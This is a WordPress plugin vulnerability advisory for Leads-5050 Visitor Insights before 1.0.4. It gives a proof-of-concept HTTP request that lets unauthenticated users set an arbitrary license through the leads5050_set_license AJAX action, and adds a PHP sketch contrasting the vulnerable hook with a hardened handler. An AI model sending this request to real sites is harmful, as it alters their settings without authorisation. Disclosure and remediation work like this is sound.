WordPress Plugin Vulnerabilities
Leads-5050 Visitor Insights < 1.0.4 - Unauthenticated License Change
Description
The leads5050_set_license AJAX action was available to unauthenticated users, allowing them to set an arbitrary license in the plugin's settings.
Proof of Concept
POST /wordpress/wp-admin/admin-ajax.php HTTP/1.1
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 46
Connection: close

action=leads5050_set_license&api_license=AAAA2
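The request above carries no session cookie and no nonce, which is what a handler reachable through WordPress's wp_ajax_nopriv_ hook accepts. The sketch below is an added example, not the plugin's own code or its 1.0.4 fix: it shows that registration pattern (commented out) beside a hardened handler, and the function names, option name and nonce action are hypothetical, as is the assumption that the plugin used the nopriv hook.

```php
<?php
// Added illustration; NOT the Leads-5050 plugin's source. The function names,
// option name ('example_leads5050_license') and nonce action are hypothetical.

// Vulnerable pattern (left commented out so this file is safe to load):
// the "nopriv" hook makes admin-ajax.php run the callback for logged-out
// visitors, and the callback does no authorization check of its own.
//
// add_action( 'wp_ajax_nopriv_leads5050_set_license', 'example_set_license' );
// add_action( 'wp_ajax_leads5050_set_license', 'example_set_license' );
// function example_set_license() {
//     update_option( 'example_leads5050_license', $_POST['api_license'] );
//     wp_send_json_success();
// }

// Hardened pattern: register only the authenticated hook.
add_action( 'wp_ajax_leads5050_set_license', 'example_set_license_hardened' );

function example_set_license_hardened() {
    // wp_ajax_* fires for ANY logged-in user, subscribers included, so the
    // callback must still check that the caller may change settings.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( array( 'message' => 'Forbidden' ), 403 );
    }

    // Reject cross-site requests: the settings page has to send a nonce
    // created with wp_create_nonce( 'example_leads5050_set_license' ) in the
    // 'nonce' field. check_ajax_referer() stops the request if it is invalid.
    check_ajax_referer( 'example_leads5050_set_license', 'nonce' );

    if ( ! isset( $_POST['api_license'] ) ) {
        wp_send_json_error( array( 'message' => 'Missing api_license' ), 400 );
    }

    // Undo WordPress's added slashes and strip tags/control characters
    // before the value is stored.
    $license = sanitize_text_field( wp_unslash( $_POST['api_license'] ) );
    update_option( 'example_leads5050_license', $license );

    wp_send_json_success();
}
```

With only the wp_ajax_ hook registered, an unauthenticated POST like the proof of concept never reaches the callback; the capability and nonce checks then cover low-privileged and cross-site callers.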
Affects Plugins
References
Classification
Type
ACCESS CONTROLS
OWASP top 10
CWE
CVSS
Miscellaneous
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2021-05-07 (about 3 years ago)
Added
2021-05-07 (about 3 years ago)
Last Updated
2021-05-07 (about 3 years ago)